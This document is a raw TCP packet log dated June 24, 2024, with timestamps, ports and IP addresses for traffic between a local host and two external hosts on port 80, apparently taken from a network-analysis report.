Jun 24, 2024 00:10:21.663532019 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663532972 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663564920 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663592100 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663605928 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663649082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663659096 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663667917 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663677931 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663711071 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663711071 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663757086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663767099 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663777113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663786888 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663796902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663813114 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663845062 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663845062 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663902998 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663953066 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663995981 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664005995 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664016962 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664026976 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664036036 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664047003 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.664078951 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.664164066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664175034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664184093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664194107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664205074 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664213896 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664221048 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.664226055 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.664243937 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.664273024 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.665836096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.665847063 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.665855885 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.665893078 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.665909052 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.665918112 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.665927887 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.665931940 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.665937901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.665946960 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.665976048 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666012049 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666043997 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666054964 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666064024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666074038 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666081905 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666110039 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666145086 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666193008 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666203022 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666212082 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666237116 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666260958 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666307926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666357040 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666362047 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666369915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666402102 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666404009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666423082 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666441917 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666476011 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666476011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666486025 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666493893 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666516066 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666548967 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666598082 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666608095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666616917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666625977 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666632891 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666661024 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666677952 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666690111 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666733027 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666749001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666758060 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666785955 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666786909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666795969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666824102 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666856050 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666867018 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666876078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666884899 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666902065 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666937113 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.666970015 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.666980982 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.667021036 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.667319059 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.667361975 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.667373896 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.667383909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.667413950 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.667471886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.667481899 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.667490959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.667500019 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.667514086 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.667551041 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668549061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668591022 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668602943 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668612957 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668638945 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668648958 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668653011 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668685913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668694019 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668695927 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668715954 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668725014 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668725014 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668768883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668792963 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668802977 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668833017 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668850899 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668853998 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668864012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668873072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668899059 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668914080 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668936014 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.668937922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668947935 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.668973923 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669003963 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669008970 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669017076 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669045925 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669066906 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669075966 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669085026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669092894 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669111013 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669120073 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669142008 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669178009 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669189930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669198990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669209003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669219017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669231892 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669256926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669265985 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669270992 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669291973 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669296026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669305086 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669325113 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669332027 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669352055 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669385910 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669389009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669399977 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669409037 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669431925 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669466019 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669497013 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669506073 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669516087 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669526100 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669534922 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669578075 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669600010 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669610023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669619083 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669635057 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669641972 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669646025 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669682026 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669714928 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669724941 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669734955 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669745922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669753075 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669759989 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669799089 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669827938 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669838905 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669848919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669857979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.669878006 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.669903040 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.705060005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.705070972 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.705079079 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.705100060 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.705108881 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.705121040 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.705182076 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.705207109 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.705216885 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.705224991 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.705250025 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.705286026 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.713936090 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.713947058 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.713958025 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.713980913 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.714032888 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.714034081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714045048 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714055061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714066982 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714078903 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.714097977 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.714158058 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714168072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714176893 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714188099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714198112 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714200020 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.714242935 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.714289904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714299917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714309931 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714320898 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.714329958 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.714359045 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.734671116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734719038 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734730959 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.734735966 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734755039 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734762907 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.734766960 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734790087 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734796047 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.734801054 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734817028 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.734854937 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.734865904 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734875917 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734885931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734919071 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.734945059 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.734961033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.734972954 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735013008 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.735033989 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735044956 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735089064 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.735126019 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735136986 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735146999 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735157967 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735168934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735176086 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.735182047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735199928 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.735230923 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.735255957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735268116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735317945 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.735338926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735349894 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.735394955 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743084908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743128061 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743143082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743143082 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743177891 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743201017 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743212938 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743225098 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743236065 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743272066 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743302107 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743333101 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743344069 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743354082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743386984 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743428946 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743438005 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743449926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743459940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743495941 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743521929 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743532896 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743546009 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743568897 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743578911 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743582964 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743590117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743621111 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743649960 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743664980 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743674040 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743679047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743684053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743716955 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743737936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743740082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743751049 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743786097 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743792057 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743798018 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743839025 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.743895054 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743906021 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743916035 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743927002 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743937016 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.743951082 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744005919 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744005919 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744061947 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744072914 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744083881 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744093895 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744111061 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744143963 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744160891 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744160891 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744174004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744184971 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744195938 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.744213104 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744249105 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.744349003 CEST	80	49726	185.172.128.116	192.168.2.5
